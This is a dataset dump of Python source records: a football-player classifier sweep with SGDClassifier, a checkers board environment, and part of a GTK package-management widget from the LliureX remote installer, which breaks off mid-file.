main(args.indir,args.outdir)\n", "sub_path": "f0_data_process/rna_seq/data_1st_submit_old_not_used/3_expr_collection.py", "file_name": "3_expr_collection.py", "file_ext": "py", "file_size_in_byte": 2007, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.makedirs", "line_number": 9, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 10, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 24, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 28, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 44, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "252199091", "text": "from sklearn.linear_model import SGDClassifier\r\nfrom sklearn.model_selection import KFold\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport Positions_Traits as posT\r\nimport helperFunctions as hf\r\n\r\nif __name__ == '__main__':\r\n files = [\"CAMS\", \"CBs\", \"CMs\", \"CDMs\", \"GKs\", \"LBs\", \"LMs\", \"RBs\", \"RMs\",\r\n \"Strikers\"]\r\n for file in files:\r\n dataset = pd.read_csv(\"Success_\" + file + \".csv\")\r\n attrbs = []\r\n attrbs_names = []\r\n attrbs = attrbs + hf.roleTraitIndexesFinder([\"Age\"], dataset.columns, hf.year_2012)\r\n attrbs = attrbs + hf.roleTraitIndexesFinder(posT.General_Info, dataset.columns, \"\")\r\n attrbs = attrbs + hf.roleTraitIndexesFinder(posT.Positive_Traits, dataset.columns, hf.year_2012)\r\n for role in posT.positionToTraits[file]:\r\n attrbs = attrbs + hf.roleTraitIndexesFinder(role, dataset.columns, hf.year_2012)\r\n attrbs = list(set(attrbs))\r\n attrbs_names = list(set(attrbs_names))\r\n X = dataset.iloc[:, attrbs].values.astype(float)\r\n y = dataset.iloc[:, -1].values\r\n X = hf.normalizeAge(hf.normalizeMarketValue(hf.normalizeCA(X, 1), -1, file), 0)\r\n kf = KFold(n_splits=5)\r\n splits = []\r\n # X = SelectKBest(f_classif, k=20).fit_transform(X, y)\r\n for train, test in kf.split(X):\r\n splits.append((train, test))\r\n last_results = {\r\n None: [],\r\n 'l2': [],\r\n 'l1': [],\r\n 'elasticnet': []\r\n }\r\n for penalty in [None, 'l2', 'l1', 'elasticnet']:\r\n results = [0] * 7\r\n index = 0\r\n for eta0 in [0.01, 0.1, 0.3, 0.5, 0.6, 0.8, 1]:\r\n for train_index, test_index in splits:\r\n X_train, X_test = X[train_index], X[test_index]\r\n y_train, y_test = y[train_index], y[test_index]\r\n clf = SGDClassifier(loss=\"squared_hinge\", penalty=penalty, eta0=eta0,\r\n alpha=0.1) # two runs, change loss(squared_hinge and perceprton) and compare\r\n clf.fit(X_train, y_train)\r\n pred_i = clf.predict(X_test)\r\n results[index] += ((1 - np.mean(pred_i != y_test)) / splits.__len__())\r\n index += 1\r\n last_results[penalty] = results\r\n plt.figure(figsize=(12, 6))\r\n plt.plot([0.01, 0.1, 0.3, 0.5, 0.6, 0.8, 1], last_results[None], color='red', marker='o',\r\n markerfacecolor='red', markersize=10)\r\n plt.plot([0.01, 0.1, 0.3, 0.5, 0.6, 0.8, 1], last_results['l2'], color='blue', marker='o',\r\n markerfacecolor='blue', markersize=10)\r\n plt.plot([0.01, 0.1, 0.3, 0.5, 0.6, 0.8, 1], last_results['l1'], color='black', marker='o',\r\n markerfacecolor='black', markersize=10)\r\n plt.plot([0.01, 0.1, 0.3, 0.5, 0.6, 0.8, 1], last_results['elasticnet'], color='brown', marker='o',\r\n markerfacecolor='brown', markersize=10)\r\n plt.title('Accuracy Rate StochasticGradientDescent ' + file)\r\n plt.xlabel('Eta0')\r\n plt.ylabel('Mean Accuracy')\r\n plt.legend([str(i) for i in last_results.keys()])\r\n plt.savefig(\"Results/StochasticGradientDescent/Hinge_Graph_\" + file + \".png\")\r\n plt.show()\r\n\r\n fig, ax = plt.subplots()\r\n\r\n # hide axes\r\n fig.patch.set_visible(False)\r\n ax.axis('off')\r\n ax.axis('tight')\r\n for key in last_results.keys():\r\n for idx in range(len(last_results[key])):\r\n last_results[key][idx] = float(\"{:.4f}\".format(last_results[key][idx]))\r\n df = pd.DataFrame(last_results, columns=last_results.keys())\r\n header = ax.table(cellText=[['']],\r\n colLabels=['penalty'],\r\n loc='bottom', bbox=[0, -0.025, 1.0, 0.15]\r\n )\r\n table = ax.table(cellText=df.values, rowLabels=[0.01, 0.1, 0.3, 0.5, 0.6, 0.8, 1], colLabels=df.columns,\r\n colWidths=[0.3, 0.3, 0.3, 0.3, 0.3], loc='bottom', cellLoc='center',\r\n rowColours=['r', 'r', 'r', 'r', 'r', 'r', 'r'],\r\n colColours=['r', 'r', 'r', 'r'], bbox=[0, -0.35, 1.0, 0.4])\r\n table.auto_set_font_size(False)\r\n table.scale(1, 1.3)\r\n table.set_fontsize(7)\r\n table.add_cell(0, -1, width=0.4, height=0.090, text=\"eta0\")\r\n plt.figure(figsize=(20, 10))\r\n table._cells[(0, 0)]._text.set_text(\"None\")\r\n fig.tight_layout()\r\n fig.savefig(\"Results/StochasticGradientDescent/Hinge_\" + file + \".png\")\r\n plt.show()\r\n", "sub_path": "AlgoLatestPrints/StochasticGradientDescent.py", "file_name": "StochasticGradientDescent.py", "file_ext": "py", "file_size_in_byte": 4705, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "helperFunctions.roleTraitIndexesFinder", "line_number": 16, "usage_type": "call"}, {"api_name": "helperFunctions.year_2012", "line_number": 16, "usage_type": "attribute"}, {"api_name": "helperFunctions.roleTraitIndexesFinder", "line_number": 17, "usage_type": "call"}, {"api_name": "Positions_Traits.General_Info", "line_number": 17, "usage_type": "attribute"}, {"api_name": "helperFunctions.roleTraitIndexesFinder", "line_number": 18, "usage_type": "call"}, {"api_name": "Positions_Traits.Positive_Traits", "line_number": 18, "usage_type": "attribute"}, {"api_name": "helperFunctions.year_2012", "line_number": 18, "usage_type": "attribute"}, {"api_name": "Positions_Traits.positionToTraits", "line_number": 19, "usage_type": "attribute"}, {"api_name": "helperFunctions.roleTraitIndexesFinder", "line_number": 20, "usage_type": "call"}, {"api_name": "helperFunctions.year_2012", "line_number": 20, "usage_type": "attribute"}, {"api_name": "helperFunctions.normalizeAge", "line_number": 25, "usage_type": "call"}, {"api_name": "helperFunctions.normalizeMarketValue", "line_number": 25, "usage_type": "call"}, {"api_name": "helperFunctions.normalizeCA", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.linear_model.SGDClassifier", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "273038155", "text": "\"\"\"\nMartin Kersner, m.kersner@gmail.com\nseoulai.com\n2018\n\"\"\"\nfrom typing import Tuple\nfrom typing import Dict\nfrom typing import List\n\nfrom seoulai_gym.envs.checkers.base import Constants\nfrom seoulai_gym.envs.checkers.base import DarkPiece\nfrom seoulai_gym.envs.checkers.base import LightPiece\nfrom seoulai_gym.envs.checkers.rules import Rules\n\n\nclass Board(Constants, Rules):\n def __init__(\n self,\n size: int=8,\n ):\n \"\"\"Board constructor.\n\n Args:\n size: Board size.\n \"\"\"\n self.size = size\n self.init()\n\n def init(\n self,\n ) -> None:\n \"\"\"Initialize board and setup pieces on board.\n\n Note: Dark pieces should be ALWAYS on the top of the board.\n \"\"\"\n self.board_list = [\n sum([[DarkPiece(), None] for _ in range(self.size//2)], []),\n sum([[None, DarkPiece()] for _ in range(self.size//2)], []),\n sum([[DarkPiece(), None] for _ in range(self.size//2)], []),\n sum([[None] for _ in range(self.size)], []),\n sum([[None] for _ in range(self.size)], []),\n sum([[None, LightPiece()] for _ in range(self.size//2)], []),\n sum([[LightPiece(), None] for _ in range(self.size//2)], []),\n sum([[None, LightPiece()] for _ in range(self.size//2)], []),\n ]\n\n def move(\n self,\n ptype: int,\n from_row: int,\n from_col: int,\n to_row: int,\n to_col: int,\n ) -> Tuple[List[List], int, bool, Dict]:\n \"\"\"Move piece across board and check validity of movement.\n\n Args:\n ptype: Type of piece making a move.\n from_row: Row of board of original piece location.\n from_col: Column of board of original piece location.\n to_row: Row of board of desired piece location.\n to_col: Column of board of desired piece location.\n\n Returns:\n obs: information about positions of pieces.\n rew: reward for perfomed step.\n done: information about end of game.\n info: additional information about current step.\n\n Raises:\n ValueError: If given movement is not valid.\n \"\"\"\n rew = 0 # TODO compute reward\n info = {}\n\n if not self.validate_move(self.board_list, from_row, from_col, to_row, to_col):\n raise ValueError(f\"Attempt to move to invalid position.\")\n else:\n info.update({\"moved\": ((from_row, from_col), (to_row, to_col))})\n\n # don't move with opponent's piece\n if ptype != self.board_list[from_row][from_col].ptype:\n raise ValueError(\"Attempt to move with opponent's piece.\")\n\n # move\n self.board_list[to_row][to_col] = self.board_list[from_row][from_col]\n self.board_list[from_row][from_col] = None\n\n # remove opponent's piece\n between_row, between_col = self.get_between_position(from_row, from_col, to_row, to_col)\n if between_row is not None and between_col is not None:\n p_between = self.board_list[between_row][between_col]\n if p_between is not None:\n self.board_list[between_row][between_col] = None\n info.update({\"removed\": ((between_row, between_col), p_between)})\n\n # become king\n p = self.board_list[to_row][to_col]\n if (to_row == 0 and p.direction == self.UP) or (to_row == self.size-1 and p.direction == self.DOWN):\n p.make_king()\n info.update({\"king\": (to_row, to_col)})\n\n # end of game?\n if len(self.get_positions(self.board_list, self.get_opponent_type(p.ptype), self.size)) == 0:\n # opponent lost all his pieces\n done = True\n elif len(self.generate_valid_moves(self.board_list, self.get_opponent_type(p.ptype), self.size)) == 0:\n # opponent cannot make any move\n done = True\n else:\n done = False\n\n obs = self.board_list\n return obs, rew, done, info\n", "sub_path": "seoulai_gym/envs/checkers/board.py", "file_name": "board.py", "file_ext": "py", "file_size_in_byte": 4028, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "seoulai_gym.envs.checkers.base.Constants", "line_number": 16, "usage_type": "name"}, {"api_name": "seoulai_gym.envs.checkers.rules.Rules", "line_number": 16, "usage_type": "name"}, {"api_name": "seoulai_gym.envs.checkers.base.DarkPiece", "line_number": 37, "usage_type": "call"}, {"api_name": "seoulai_gym.envs.checkers.base.DarkPiece", "line_number": 38, "usage_type": "call"}, {"api_name": "seoulai_gym.envs.checkers.base.DarkPiece", "line_number": 39, "usage_type": "call"}, {"api_name": "seoulai_gym.envs.checkers.base.LightPiece", "line_number": 42, "usage_type": "call"}, {"api_name": "seoulai_gym.envs.checkers.base.LightPiece", "line_number": 43, "usage_type": "call"}, {"api_name": "seoulai_gym.envs.checkers.base.LightPiece", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "474538835", "text": "import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Pango, GdkPixbuf, Gdk, Gio, GObject,GLib\n\nimport copy\nimport gettext\nimport Core\n\nimport Dialog\nimport time\nimport threading\nimport sys\nimport os\n\ngettext.textdomain('lliurex-remote-installer-gui')\n_=gettext.gettext\n\n\nRSRC=\"./\"\n\n\nclass DebBox(Gtk.VBox):\n\t\n\t\n\tdef __init__(self):\n\t\t\n\t\tGtk.VBox.__init__(self)\n\t\t\n\t\tself.core=Core.Core.get_core()\n\t\t\n\t\tbuilder=Gtk.Builder()\n\t\tbuilder.set_translation_domain('lliurex-remote-installer-gui')\n\t\tui_path=RSRC + \"lliurex-remote-installer.ui\"\n\t\tbuilder.add_from_file(ui_path)\n\t\tself.main_box=builder.get_object(\"deb_data_box\")\n\t\tself.add_deb_button=builder.get_object(\"add_deb_button\")\n\t\tself.package_label=builder.get_object(\"package_label_deb\")\n\t\tself.package_list_box=builder.get_object(\"deb_list_box\")\n\t\tself.package_list=builder.get_object(\"deb_list_box\")\n\t\tself.data_vp=builder.get_object(\"deb_list_viewport\")\n\t\tself.apply_deb_button=builder.get_object(\"apply_deb_button\")\n\t\t\n\t\t\n\n\t\tself.add(self.main_box)\n\t\t\n\t\tself.connect_signals()\n\t\tself.set_css_info()\n\t\t\n\t\tself.core.current_var=None\n\t\tself.current_id=None\n\t\t\n\t\tself.thread=threading.Thread()\n\t\tself.thread_ret=None\n\t\t\n\t\t\n\t\t\n\t#def __init__\n\t\n\t\n\tdef set_css_info(self):\n\t\t\n\t\tself.style_provider=Gtk.CssProvider()\n\t\tf=Gio.File.new_for_path(\"lliurex-remote-installer.css\")\n\t\tself.style_provider.load_from_file(f)\n\t\tGtk.StyleContext.add_provider_for_screen(Gdk.Screen.get_default(),self.style_provider,Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)\n\t\tself.package_label.set_name(\"OPTION_LABEL\")\n\t\t\n\t\t\t\n\t#def set-css_info\n\t\n\t\n\tdef set_info(self,info):\n\t\t\n\t\t#Empty list\n\t\tfor c in self.package_list_box.get_children():\n\t\t\tself.package_list_box.remove(c)\n\t\t\t\n\t\tself.core.var=info\n\t\tself.core.current_var=copy.deepcopy(self.core.var)\n\t\tfor x in self.core.var[\"deb\"][\"packages\"]:\n\t\t\tself.new_package_button(\"%s\"%x)\n\t\t\t\n\t\t#self.core.lri.main_window.connect(\"delete_event\",self.check_changes,True)\n\n\t#def set_info\n\t\n\t\n\tdef connect_signals(self):\n\t\t\n\t\t\n\t\tself.add_deb_button.connect(\"clicked\",self.add_deb_button_clicked)\n\t\tself.apply_deb_button.connect(\"clicked\",self.apply_deb_button_clicked)\n\t\t#self.core.lri.main_window.connect(\"delete_event\",self.check_changes,True)\n\t\t\n\t#def connect_signals\n\t\n\t\n\tdef deb_list_init(self):\n\t\t\n\t\ttry:\n\t\t\tself.new_debs\n\t\t\treturn True\n\t\texcept Exception as e:\n\t\t\t#print \"inicializando variables de listas\"\n\t\t\tself.new_debs=[]\n\t\t\tself.list_new_debs=[]\n\t\t\treturn True\n\t\t\n\t#def deb_list_init\n\t\n\tdef check_user_desktop(self):\n\t\t\n\t\tpath=os.path.expanduser(\"~/\")\n\t\t\n\t\ttry:\n\t\t\n\t\t\tf=open(os.path.expanduser(\"~/.config/user-dirs.dirs\"))\n\t\t\tlines=f.readlines()\n\t\t\tf.close()\n\t\t\t\n\t\t\tfor item in lines:\n\t\t\t\tif \"XDG_DESKTOP_DIR\" in item:\n\t\t\t\t\tfirst=item.find(\"/\")+1\n\t\t\t\t\tlast=item.rfind('\"')\n\t\t\t\t\tpath=path + item[first:last].strip(\"\\n\")\n\t\t\t\t\t\n\t\t\t\t\t\n\t\texcept Exception as e:\n\t\t\tprint(e,\"!!!\")\n\t\t\t\n\t\t\t\n\t\treturn path\n\t\n\t\n\tdef add_deb_button_clicked(self,widget):\n\t\t\n\t\tpath=self.check_user_desktop()\n\t\t#print path\n\t\tfcb=Dialog.FileDialog(self.core.lri.main_window,_(\"Please choose a file\"), path)\n\t\tresponse=fcb.run()\n\t\t\n\t\tself.deb_list_init()\n\t\t\n\t\tif response==Gtk.ResponseType.OK:\n\t\t\tdeb_url=fcb.get_filename()\n\t\t\tfcb.destroy()\n\t\t\tpkg=os.path.basename(deb_url)\n\t\t\textension=os.path.splitext(pkg)[1]\n\t\t\tif extension not in [\".deb\",\".DEB\"]:\n\t\t\t\tself.error_extension_dialog(pkg)\n\t\t\t\tfcb.destroy()\n\t\t\t\treturn False\n\t\t\t#Compruebo si es un paquete nuevo de la lista\n\t\t\tif pkg not in self.core.current_var[\"deb\"][\"packages\"]:\n\t\t\t\tself.core.current_var[\"deb\"][\"packages\"].append(pkg)\n\t\t\t\tself.new_package_button(pkg)\n\t\t\t\t#print \"paquete nuevo en lista, esta subido??\"\n\t\t\t\t#Compruebo que es accesible via apache, sino lo apunto para copiar cuando aplique.\n\t\t\t\texist_in_server=self.core.n4d.app_deb_exist(pkg, self.core.current_var[\"deb\"][\"url\"])\n\t\t\t\tself.core.dprint(\"(DebBox)(add_deb_button_clicked) self.core.n4d.app_deb_exist: %s\"%exist_in_server)\n\t\t\t\tif not exist_in_server[0]:\n\t\t\t\t\t#print \"No existe este deb lo debo de subir\"\n\t\t\t\t\tself.core.dprint(\"(DebBox)(add_deb_button_clicked) Package %s marked to upload to server\"%pkg)\n\t\t\t\t\tself.new_debs.append([pkg,deb_url])\n\t\t\t\t\tself.list_new_debs.append(pkg)\n\t\t\t\t\t\n\n\t\t\t# ###### #\n\t\t\t\n\t\t\treturn True\n\t\telse:\n\t\t\tfcb.destroy()\n\t\t\treturn False\n\t\t\t\n\t#def add-deb_button_clicked\n\t\n\t\n\tdef hide_window(self,widget,event):\n\t\t\n\t\twidget.hide()\n\t\treturn True\n\t\t\n\t#def new_package_window\n\n\n\tdef check_changes(self,widget=True,event=True,manage_dialog=False):\n\t\t\n\t\t\n\t\tif not manage_dialog:\n\t\t\tif self.core.current_var==None:\n\t\t\t\treturn False\n\t\t\treturn self.core.current_var != self.core.var\n\t\t\n\t\t\t\t\n\t\tif self.core.current_var!=None and self.core.current_var != self.core.var:\n\t\t\tif not self.changes_detected_dialog(False):\n\t\t\t\treturn True\n\t\t\n\t\tsys.exit(0)\n\t\t\t\n\n\t#def check_changes\n\t\t\n\t\n\n\t\n\tdef new_package_button(self,pkg_name):\n\t\t\n\t\thbox=Gtk.HBox()\n\t\tlabel=Gtk.Label(pkg_name)\n\t\tb=Gtk.Button()\n\t\ti=Gtk.Image.new_from_file(\"trash.svg\")\n\t\tb.add(i)\n\t\tb.set_halign(Gtk.Align.CENTER)\n\t\tb.set_valign(Gtk.Align.CENTER)\n\t\tb.set_name(\"DELETE_ITEM_BUTTON\")\n\t\tb.connect(\"clicked\",self.delete_package_clicked,hbox)\n\t\thbox.pack_start(label,False,False,0)\n\t\thbox.pack_end(b,False,False,10)\n\t\thbox.show_all()\n\t\tlabel.set_margin_right(20)\n\t\tlabel.set_margin_left(20)\n\t\tlabel.set_margin_top(20)\n\t\tlabel.set_margin_bottom(20)\n\t\thbox.set_name(\"PKG_BOX\")\n\t\tself.package_list_box.pack_start(hbox,False,False,5)\n\t\tself.package_list_box.queue_draw()\n\t\thbox.queue_draw()\n\t\t\n\t#def new_package_button\n\t\n\t\n\t\n\t# #### PACKAGE CHANGES ################### #\n\t\n\t\n\tdef delete_package_clicked(self,button,hbox):\n\t\t\n\t\tpkg=hbox.get_children()[0].get_text()\n\t\t\n\t\tif self.delete_package_dialog(pkg):\n\t\t\n\t\t\tself.package_list_box.remove(hbox)\n\t\t\t\n\t\t\tfor p in range(len(self.core.current_var[\"deb\"][\"packages\"])-1,-1,-1):\n\t\t\t\tif self.core.current_var[\"deb\"][\"packages\"][p]==pkg:\n\t\t\t\t\tself.core.current_var[\"deb\"][\"packages\"].pop(p)\n\t\t\t#Compruebo que es accesible via apache, y pregunto si lo borro tambien del servidor\n\t\t\texist_in_server=self.core.n4d.app_deb_exist(pkg, self.core.current_var[\"deb\"][\"url\"])\n\t\t\tif exist_in_server[0]:\n\t\t\t\tif self.remove_file_dialog(pkg):\n\t\t\t\t\tself.thread=threading.Thread(target=self.delete_package_thread(pkg))\n\t\t\t\t\tself.thread.daemon=True\n\t\t\t\t\tself.thread.start()\n\t\t\t\t\t\n\t\t\t\t\tmain_window=self.core.lri.main_window\n\t\t\t\t\tdialog=Dialog.ApplyingChangesDialog(main_window,title=\"Lliurex Remote Installer\",msg=_(\"Deleting files.......\"))\n\t\t\t\t\tdialog.show()\n\t\t\t\t\tGLib.timeout_add(500,self.check_delete_thread,dialog)\n\t\t\t\n\t\t\t# ######### #\n\t\n\t\n\t#def delete_package_clicked\n\t\n\tdef delete_package_thread(self,pkg):\n\t\n\t\ttry:\n\t\t\tself.core.dprint(\"Deleting file...\")\n\t\n\t\t\turl_dest=\"/var/www/llx-remote/\"+str(pkg)\n\t\t\tself.deleted=self.core.n4d.remove_file(url_dest)\n\t\t\tif not self.deleted[0]:\n\t\t\t\tcomment=_(\"The file %s cannot be deleted\")%pkg\n\t\t\t\tself.remove_file_info_dialog(comment)\n\t\t\t\t\n\t\t\tself.thread_ret={\"status\":True,\"msg\":\"BROKEN\"}\n\t\t\t\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\treturn False\n\t\t\t\n\t#def delete_package_thread\n\t\n\tdef check_delete_thread(self,dialog):\n\t\t\n\t\tif self.thread.is_alive():\n\t\t\treturn True\n\t\t\n\t\tdialog.destroy()\n\t\t\n\t\tfor c in self.package_list_box.get_children():\n\t\t\tself.package_list_box.remove(c)\n\t\t\t\n\t\tfor x in self.core.current_var[\"deb\"][\"packages\"]:\n\t\t\tself.new_package_button(\"%s\"%x)\n\t\tif self.deleted[0]:\n\t\t\tself.core.var=copy.deepcopy(self.core.current_var)\n\t\t\tself.core.n4d.set_variable(self.core.var)\n\t\t\t\n\t\t\t\n\t\t\n\t#check_delete_thread\n\t\n\t\n\tdef apply_deb_button_clicked(self,widget):\n\t\t\n\t\tself.deb_list_init()\n\t\tself.thread=threading.Thread(target=self.apply_changes_thread)\n\t\tself.thread.daemon=True\n\t\tself.thread.start()\n\t\t\n\t\t#Se crea el mensaje de Apply segun si sse suben ficheros o no.\n\t\tself.msg1=_(\"Applying changes.......\")\n\t\tif self.new_debs not in [None,\"\",[]]:\n\t\t\tself.msg1=_(\"Updating files and applying changes.......\")\n\t\telse:\n\t\t\tself.msg1=_(\"Applying changes.......\")\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tdialog=Dialog.ApplyingChangesDialog(main_window,title=\"Lliurex Remote Installer\",msg=self.msg1)\n\t\tdialog.show()\n\t\tGLib.timeout_add(500,self.check_apply_thread,dialog)\n\t\t\n\t#def apply_changes_button_clicked\n\t\n\t\t\n\t\n\tdef apply_changes_thread(self):\n\t\t\n\t\ttry:\n\t\t\t\n\t\t\tprint(\"Testing.....\")\n\t\t\tif self.new_debs not in [None,\"\",[]]:\n\t\t\t\tself.core.dprint(\"Sending files to server...\")\n\t\t\t\tfor deb in self.new_debs:\n\t\t\t\t\tpkg=deb[0]\n\t\t\t\t\tdeb_url=deb[1]\n\t\t\t\t\tif self.core.current_var[\"deb\"][\"url\"] in [None,\"\",[]]:\n\t\t\t\t\t\tself.core.current_var[\"deb\"][\"url\"]=\"http://server/llx-remote/\"\n\t\t\t\t\turl_dest=self.core.current_var[\"deb\"][\"url\"].split('http://server/')[1]\n\t\t\t\t\turl_dest=\"/var/www/\"+str(url_dest)\n\t\t\t\t\tip_dest=self.core.n4d.server_ip\n\t\t\t\t\tuploaded=self.core.n4d.send_file(ip_dest,deb_url,url_dest)\n\t\t\t\t\tif not uploaded:\n\t\t\t\t\t\tself.error_up_dialog(pkg)\n\n\t\t\t\t#Inicializo de nuevo la lista de paquetes, ya esta subido todo lo que se queria.\n\t\t\t\tself.new_debs=[]\n\t\t\t\tself.list_new_debs=[]\n\t\t\tself.core.dprint(\"Applying changes...\")\n\t\t\tself.core.var=copy.deepcopy(self.core.current_var)\n\t\t\tself.test_deb=self.core.n4d.test_deb_list(self.core.var)\n\t\t\tself.thread_ret={\"status\":True,\"msg\":\"BROKEN\"}\n\n\t\t\t\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\treturn False\n\t\t\n\t\t\n\t#def apply_changes_thread\n\t\n\tdef check_apply_thread(self,dialog):\n\t\t\n\t\t\n\t\tif self.thread.is_alive():\n\t\t\treturn True\n\t\t\n\t\tdialog.destroy()\n\t\t#Se pudo testear la lista de debs, es un [True,dict,list_debs_ok,list_debs_fail]\n\t\tif self.test_deb[0]:\n\t\t\tif self.test_deb[3] not in [None,\"\",\"[]\",[]]:\n\t\t\t\tif self.delete_test_deb_dialog(self.test_deb[3]):\n\t\t\t\t\tself.core.n4d.set_variable(self.test_deb[1])\n\t\t\t\t\tself.core.var=copy.deepcopy(self.test_deb[1])\n\t\t\t\t\tself.core.current_var=copy.deepcopy(self.test_deb[1])\n\t\t\t\telse:\n\t\t\t\t\tself.core.var[\"deb\"][\"url\"]=\"http://server/llx-remote/\"\n\t\t\t\t\tself.core.n4d.set_variable(self.core.var)\n\t\t\telse:\n\t\t\t\t\tself.core.var[\"deb\"][\"url\"]=\"http://server/llx-remote/\"\n\t\t\t\t\tself.core.n4d.set_variable(self.core.var)\n\t\t\t\n\t\telse:\n\t\t\tself.core.dprint(\"Error en el test, no se guarda la variable\")\n\t\t\n\t\tself.set_info(self.core.var)\n\t\tself.core.dprint(\"Done\")\n\t\t\n\t\tif not self.thread_ret[\"status\"]:\n\t\t\tmw=self.core.lri.main_window\n\t\t\td=Dialog.ErrorDialog(mw,\"\",self.thread_ret[\"msg\"])\n\t\t\td.run()\n\t\t\td.destroy()\n\t\t\n\n\t\treturn False\n\t\t\n\t#def check_thread\n\t\n\t\n\t# ######################################################### #\n\t\n\t\n\t# #### DIALOGS ################### #\n\t\n\tdef error_extension_dialog(self,pkg_name):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tdialog=Dialog.ErrorDialog(main_window,_(\"Error in Extension\"),_(\"This %s package has not the extension required.\\nPlease only DEB packages in this list.\")%pkg_name)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\t\n\t\treturn True\n\t\t\n\t#def delete_package_dialog\n\n\n\tdef error_up_dialog(self,pkg_name):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tdialog=Dialog.ErrorDialog(main_window,_(\"Error in publishing\"),_(\"This %s package can't be uploaded to server.\\nPlease review the parameters or inform to LliureX Team.\")%pkg_name)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\t\n\t\treturn True\n\t\t\n\t#def error_up_dialog\n\t\n\t\n\tdef delete_package_dialog(self,pkg_name):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tdialog=Dialog.QuestionDialog(main_window,_(\"Delete package\"),_(\"Do you want to delete '%s'?\")%pkg_name)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\tif response== Gtk.ResponseType.OK:\n\t\t\treturn True\n\t\t\n\t\treturn False\n\t\t\n\t#def delete_package_dialog\n\t\n\tdef remove_file_dialog(self,pkg_name):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tdialog=Dialog.QuestionDialog(main_window,_(\"Delete package\"),_(\"IMPORTANT\\nDo you want to delete this DEB from your 